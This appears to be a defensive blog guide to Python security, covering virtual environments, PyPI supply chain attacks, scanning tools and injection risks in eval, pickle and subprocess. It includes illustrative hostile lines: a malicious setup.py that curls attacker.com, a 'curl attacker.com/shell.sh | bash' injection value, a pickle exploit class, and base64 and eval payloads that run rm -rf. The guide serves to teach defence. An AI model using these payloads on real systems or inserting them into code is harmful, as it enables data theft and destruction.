Python Security: What Can Go Wrong When You Code and When You Download

Python is everywhere — scripting, automation, security tooling, data pipelines, web backends. That ubiquity comes with an attack surface that is easy to underestimate. Python’s design philosophy (batteries included, dynamic, flexible) creates categories of risk that simply do not exist in stricter languages.

This guide covers two scenarios: the risks you face when writing Python code, and the risks you face when downloading and running scripts or packages someone else wrote. Both matter, and the failure modes are different.

TL;DR

Always use virtual environments — but understand that venv is not a sandbox: malicious code inside a venv can still read files, make network calls, and access your secrets

PyPI has no pre-publication malware scanning — typosquatting, dependency confusion, and maintainer takeovers are active attack vectors

Use guarddog before installing unknown packages, pip-audit for CVE scanning, and bandit for your own code

eval(), exec(), pickle, and subprocess with user input are injection vulnerabilities, not just bad practice

Secrets in source code get committed, pushed, and leaked — use environment variables or a secrets manager

Before running any downloaded script: read it, check its imports, and verify the package name character by character

Part 1: The Environment — Isolation Before Anything Else

Virtual Environments Are a Security Boundary, Not Just Convenience

Most Python developers know venvs prevent dependency conflicts. Fewer think of them as a security control — but they are.

What happens without a venv:

# No venv — pip installs globally, as your user or as root
pip install requests
# Now requests (and anything it pulls in) has access to your system Python
# and potentially to site-packages shared across all your projects

The problems this creates:

Cross-project contamination — a malicious package installed for Project A is available to Project B. Venvs break this: each environment is isolated.
Privilege escalation via system Python — if you habitually run sudo pip install, you’re installing third-party code with root privileges. Any malicious package that runs code at install time (via setup.py or PEP 517 hooks) executes as root.
No clean uninstall path — without venvs, you cannot reliably remove a package and all its side effects. A compromised environment can be nuked and recreated; a contaminated system Python is harder to clean.

Always use a venv:

# Create and activate
python -m venv .venv
source .venv/bin/activate       # Linux/macOS
.venv\Scripts\activate          # Windows

# Install inside the venv only
pip install requests

# Deactivate when done
deactivate

Modern projects should use pyproject.toml with a tool like uv or poetry that enforces isolation automatically. The point is the same: code you did not write runs in a contained environment where damage is limited.

Venv Is Not a Sandbox

This is the most common misconception about virtual environments: a venv does not restrict what code can do at the OS level.

A malicious package installed inside a venv can still:

Read any file your user account can read — including ~/.ssh/, ~/.aws/credentials, browser cookie databases
Make outbound network connections to exfiltrate data
Spawn subprocesses (subprocess, os.system)
Read environment variables — including AWS_SECRET_ACCESS_KEY, DATABASE_URL, any secret you have set in your shell
Write or delete files anywhere your user has write access
Access other venvs on the same machine

The venv boundary is a Python module namespace boundary, not an OS-level isolation boundary. It prevents package conflicts between projects. It does not prevent malicious code from running.

For actual isolation when running untrusted code, use Docker with restricted permissions:

# No network, no access to home directory, read-only filesystem except /tmp
docker run --rm \
  --network none \
  --read-only \
  --tmpfs /tmp \
  -v $(pwd)/suspicious_script.py:/script.py:ro \
  python:3.12-slim python /script.py

This is the difference: venv protects your project dependencies from each other. Docker (or a VM) protects your system from untrusted code.

The `--user` Flag Is Not a Safe Alternative

pip install --user installs to ~/.local/lib/python3.x/site-packages. This avoids root, but:

It shares across all projects for that user
It is included in sys.path by default, meaning a malicious package installed --user can still affect all your Python processes
It still runs setup.py and build hooks with your full user privileges

Use venvs. --user is a compromise, not a solution.

Part 2: Package Security — What PyPI Won’t Catch for You

PyPI Has No Pre-Publication Malware Scanning

Anyone with a PyPI account can publish a package. There is no review process, no sandbox execution of install hooks before publication. PyPI does conduct post-hoc malware scanning and removes packages when discovered — but the window between publication and removal can be hours or days.

During that window, automated systems (CI/CD pipelines, Docker builds, developer laptops) may already have installed the package.

Typosquatting — One Character Away

Attackers register package names that are visually similar to popular packages:

Legitimate	Typosquatted
`requests`	`request` / `requestss` / `requuests`
`numpy`	`nunpy` / `nummpy` / `numpy-base`
`Pillow`	`Pil` / `pillow-python`
`boto3`	`bot03` (zero not O) / `boto`
`pycrypto`	`py-crypto` / `pycrypt0`

The malicious package usually works as expected — it installs the real library as a dependency and adds its own malicious code on top. The victim sees no errors.

How to protect yourself:

# Always verify the exact package name on pypi.org before installing
# Check: publication date, download count, maintainer history

# Use pip-audit to scan installed packages for known vulnerabilities
pip install pip-audit
pip-audit

# Use our own gate-cli for supply chain risk scoring
pip install gate-cli
gate scan requests numpy pandas

Dependency Confusion

If your internal package registry serves packages by name, and a package with that name also exists on PyPI, pip may fetch the PyPI version instead of your internal one — especially if the PyPI version has a higher version number.

Attackers register public PyPI packages with names that match internal corporate package names. When a developer or CI pipeline runs pip install, they get the attacker’s package.

Mitigation:

# pip.conf — explicitly scope internal packages to your private registry
[global]
index-url = https://your-internal-registry/simple/
extra-index-url = https://pypi.org/simple/

# Better: use --no-index for packages that should only come from internal sources
pip install --no-index --find-links=./vendor/ internal-package

`setup.py` and Build Hook Execution at Install Time

When you run pip install somepackage, pip may execute setup.py or PEP 517 build hooks — before you have reviewed any code. This is arbitrary code execution by design.

# A malicious setup.py — runs at pip install time
from setuptools import setup
import subprocess

# This executes during `pip install`
subprocess.run(["curl", "https://attacker.com/exfil?host=$(hostname)", "-s"],
               capture_output=True)

setup(name="totally-legitimate-package", ...)

For untrusted packages: use pip install --no-build-isolation combined with reviewing source first, or use pip download to fetch the wheel without installing, then inspect before installing.

Pinning Dependencies — Version Locking Is a Security Control

Floating dependencies (requests>=2.0) will install whatever is current at the time. If a package is later compromised (maintainer account takeover, malicious release), your next pip install or Docker build fetches the compromised version.

# Bad — installs whatever is latest
requests>=2.28.0

# Better — pins exact version
requests==2.31.0

# Best — pins version AND hash
# Generate with:
pip-compile --generate-hashes requirements.in

Hash pinning means pip refuses to install a package whose content does not match the recorded hash — even if the version number is the same. It makes supply chain substitution attacks significantly harder.

Part 3: Scanning Tools — What to Use and When

No single tool catches everything. The tooling landscape splits into three distinct categories that solve different problems — use all three.

Category 1: Vulnerability Scanners (Known CVEs)

These check whether your installed packages have known, published vulnerabilities. They are fast, reliable, and catch the easy stuff — but they are useless against a new malicious package that has no CVE yet.

pip-audit — the current standard, maintained by PyPA (the Python Packaging Authority):

pip install pip-audit

# Scan current environment
pip-audit

# Scan a requirements file without installing
pip-audit -r requirements.txt

# Output as JSON for CI
pip-audit --format json -o audit-results.json

Safety — uses the PyPI Safety DB, good second opinion:

pip install safety
safety check
safety check -r requirements.txt

Snyk — commercial with a free tier, strongest CI/CD integration, pulls from multiple vulnerability databases including its own:

npm install -g snyk   # yes, installed via npm
snyk auth
snyk test --file=requirements.txt

Snyk’s advantage: it tracks transitive dependencies (dependencies of dependencies) and can suggest upgrade paths that fix multiple issues at once. It also monitors your project continuously and alerts when new CVEs are published against your locked versions.

Trivy — broad scanner (containers, filesystems, repos), useful when Python is one part of a larger stack:

# Scan a directory containing requirements.txt or Pipfile.lock
trivy fs .

# Scan a Docker image that contains Python packages
trivy image my-python-app:latest

Category 2: Malicious Package Detectors (Behavioral Analysis)

These look for suspicious patterns in package code — network calls in setup.py, obfuscated strings, credential-harvesting patterns, unusual file system access. This is what catches typosquats and supply chain attacks that have no CVE.

guarddog (Datadog) — the strongest open source tool in this category:

pip install guarddog

# Scan before installing — downloads and inspects without executing
guarddog pypi verify requests
guarddog pypi verify numpy==1.24.0

# Scan a requirements file
guarddog pypi verify -r requirements.txt

guarddog checks for: setup.py network calls, cmd execution at install time, obfuscated code (base64 + exec patterns), credential file access, reverse shell patterns, and more. It inspects the package source without running it.

gate-cli — our own supply chain scanner, covers quarantine window risk (newly published packages with few downloads are statistically more likely to be malicious):

pip install gate-cli
gate scan requests numpy pandas
gate scan -r requirements.txt

gate focuses on signals that CVE scanners miss: publication recency, maintainer reputation, download velocity anomalies, and install-hook presence.

What these tools cannot do: detect a package that installs cleanly and only activates malicious behavior at runtime under specific conditions (e.g., when AWS_PROFILE is set, or when run on a CI server). That class of attack requires behavioral monitoring at runtime.

Category 3: Static Analysis for Your Own Code

These scan code you wrote for security vulnerabilities — injection risks, hardcoded secrets, insecure function use. They do not scan third-party packages.

Bandit — Python-specific, catches the issues covered in Part 4 of this article:

pip install bandit

# Scan a file or directory
bandit -r myproject/

# High severity only
bandit -r myproject/ -l -i

# Output as JSON for CI
bandit -r myproject/ -f json -o bandit-report.json

Bandit flags: eval() and exec() calls, subprocess with shell=True, pickle usage, hardcoded passwords, weak cryptography, SQL injection patterns, and more. False positive rate is low enough for CI enforcement.

Semgrep — more powerful, supports custom rules, good for team-wide enforcement:

pip install semgrep

# Run with the Python security ruleset
semgrep --config=p/python-security .

# Run the OWASP Top 10 ruleset
semgrep --config=p/owasp-top-ten .

Semgrep’s advantage: you can write custom rules for your codebase. If your project has a pattern that should never appear (e.g., direct SQL string concatenation), write a rule for it once and it becomes part of every developer’s pre-commit check.

Recommended Workflow

Stage	Tool	What it catches
Before `pip install`	`guarddog pypi verify`	Malicious packages, behavioral patterns
After install / in CI	`pip-audit`	Known CVEs in dependencies
In CI (deeper)	`snyk test`	CVEs + transitive deps + upgrade paths
Pre-commit / CI	`bandit`	Security issues in your own code
Pre-commit / CI	`semgrep`	Custom rules + OWASP patterns
Container builds	`trivy image`	Full stack: OS packages + Python

For production projects, run at minimum pip-audit + bandit in CI. Add guarddog for any project that installs packages dynamically or from less-known sources. Snyk is worth the free-tier signup for projects with complex dependency trees.

Part 4: Code You Write — The Python Injection Landscape

`eval()` and `exec()` — Injection by Design

eval() executes any Python expression. exec() executes any Python statement. If either receives user-controlled input, you have arbitrary code execution.

# Vulnerable — user can pass: "__import__('os').system('rm -rf ~')"
user_input = input("Enter a formula: ")
result = eval(user_input)

# Vulnerable exec — user can define and run anything
exec(user_input)

There is no safe way to sandbox eval() or exec() with user input in standard CPython. The __builtins__ restriction approach has been bypassed repeatedly.

The fix: don’t use them on user input. Use ast.literal_eval() if you need to parse Python literals (strings, numbers, lists, dicts) — it raises ValueError on anything that is not a literal value.

import ast

# Safe — only evaluates literals, raises ValueError on code
data = ast.literal_eval(user_input)

`pickle` — Deserialization Is Code Execution

Python’s pickle module serializes and deserializes Python objects. Deserializing a pickle payload executes Python code — the object’s __reduce__ method runs during loading.

import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("whoami",))

# This executes os.system("whoami") on the machine that loads it
payload = pickle.dumps(Exploit())

# On the victim's machine:
pickle.loads(payload)   # ← arbitrary code execution

Never unpickle data from untrusted sources. This includes: files uploaded by users, data from external APIs, inter-service messages if the sender is not fully trusted.

Safe alternatives:

json — for data exchange (no code execution risk)
msgpack — for binary serialization
protobuf — for typed inter-service communication

# Instead of pickle for data exchange:
import json
data = json.dumps(my_object)
restored = json.loads(data)

`subprocess` — Shell Injection

subprocess.run() with shell=True passes the command to /bin/sh — if any part of the command includes user input, you have shell injection.

# Vulnerable — user input is "filename; curl attacker.com/shell.sh | bash"
filename = request.args.get("file")
subprocess.run(f"cat {filename}", shell=True)

# Safe — pass as list, no shell interpolation
subprocess.run(["cat", filename], shell=False)

Rule: never use shell=True with any variable content. Pass arguments as a list. subprocess with a list does not invoke a shell — each element is passed as a literal argument to the executable.

Path Traversal

File operations with user-supplied paths can reach outside the intended directory:

# Vulnerable — user passes "../../etc/passwd"
filename = request.args.get("file")
with open(f"/var/data/uploads/{filename}") as f:
    return f.read()

Fix: resolve the final path and verify it is still inside the intended root:

from pathlib import Path

BASE_DIR = Path("/var/data/uploads").resolve()
requested = (BASE_DIR / filename).resolve()

if not requested.is_relative_to(BASE_DIR):
    raise PermissionError("Path traversal attempt")

with open(requested) as f:
    return f.read()

Part 4: Secrets — The Leak That Keeps on Leaking

Hardcoded Credentials Are a Permanent Vulnerability

Secrets committed to source code get into git history. Even if you remove them in the next commit, they exist in every clone made before that commit — and in the history that git log reveals.

# This is in your git history forever
API_KEY = "sk-live-xxxxxxxxxxxxxxxxxxx"
DB_PASSWORD = "SuperSecret123!"

The fix: environment variables or a secrets manager, never source code.

import os

# Load from environment
API_KEY = os.environ["API_KEY"]
DB_PASSWORD = os.environ["DB_PASSWORD"]

# Or use python-dotenv for development (never commit the .env file)
from dotenv import load_dotenv
load_dotenv()
API_KEY = os.getenv("API_KEY")

# .gitignore — add before first commit
.env
*.env
.env.local
secrets.json

If you have already committed a secret: rotate it immediately. Removing it from the current commit does not help — the secret is in history and in every existing clone.

Pre-commit scanning:

# Install detect-secrets to catch secrets before they hit the repo
pip install detect-secrets
detect-secrets scan > .secrets.baseline
detect-secrets audit .secrets.baseline

Part 5: Before You Run a Downloaded Script

Downloaded scripts (from GitHub, gists, blog posts, Reddit) deserve a read-through before execution. The checklist:

1. Check the imports

# Red flags in a script claiming to be a "system cleaner"
import subprocess
import socket
import base64
import os

Any script that imports socket, subprocess, and base64 together without a clear reason is suspicious. Network + shell execution + encoding is a common malware pattern.

2. Look for obfuscation

# Red flags — obfuscated payload
exec(base64.b64decode("aW1wb3J0IG9zOyBvcy5zeXN0ZW0oInJtIC1yZiAvIik="))

# Decode it before running anything
import base64
print(base64.b64decode("aW1wb3J0IG9zOyBvcy5zeXN0ZW0oInJtIC1yZiAvIik="))
# → b'import os; os.system("rm -rf /")'

3. Run in a disposable environment

For any script you are not fully confident about, run it in a Docker container or VM with no access to your credentials, home directory, or network:

# Disposable container — script cannot reach your files or credentials
docker run --rm --network none -v $(pwd)/script.py:/script.py python:3.12-slim python /script.py

4. Verify package names character by character

Before pip install anything-from-a-blog-post: go to pypi.org/project/anything-from-a-blog-post and verify:

The package exists
The publication date is not from yesterday with 3 downloads
The maintainer has a history
The description matches what was advertised

Quick Reference Checklist

Area	What to do
Environments	Always use venv; never `sudo pip install`
Venv ≠ sandbox	Venv isolates modules, not OS access — use Docker for real isolation
Dependencies	Pin versions; use hash verification for production
Package names	Verify on pypi.org before installing; check character by character
Install hooks	Know that `setup.py` runs at install time — use `guarddog` first
Scanning: malicious	`guarddog pypi verify <package>` before installing unknowns
Scanning: CVEs	`pip-audit` in CI; Snyk for transitive dependency tracking
Scanning: your code	`bandit` + `semgrep` in CI or pre-commit
`eval` / `exec`	Never on user input; use `ast.literal_eval` for literals
`pickle`	Never deserialize untrusted data
`subprocess`	Never `shell=True` with variable content; pass as list
Path operations	Resolve and validate paths stay within intended root
Secrets	Environment variables only; `.gitignore` your `.env`; rotate anything committed
Downloaded scripts	Read before running; check imports; run in Docker with `--network none`

We Built a Supply Chain Scanner — Here’s What We Learned — gate-cli scans pip and npm packages for supply chain risk before you install them
The Package You Trusted: How the Axios Supply Chain Attack Happened — real-world supply chain attack anatomy; the same patterns apply to PyPI
LOLBins in 2026: How Attackers Use Windows Against Itself — subprocess abuse in Python is the scripting equivalent of LOLBin abuse at the OS level
Invisible Characters as an Attack Vector — Unicode injection in code applies directly to Python scripts in repositories
GitHub Secrets Management Crisis — what happens when secrets make it into source code at scale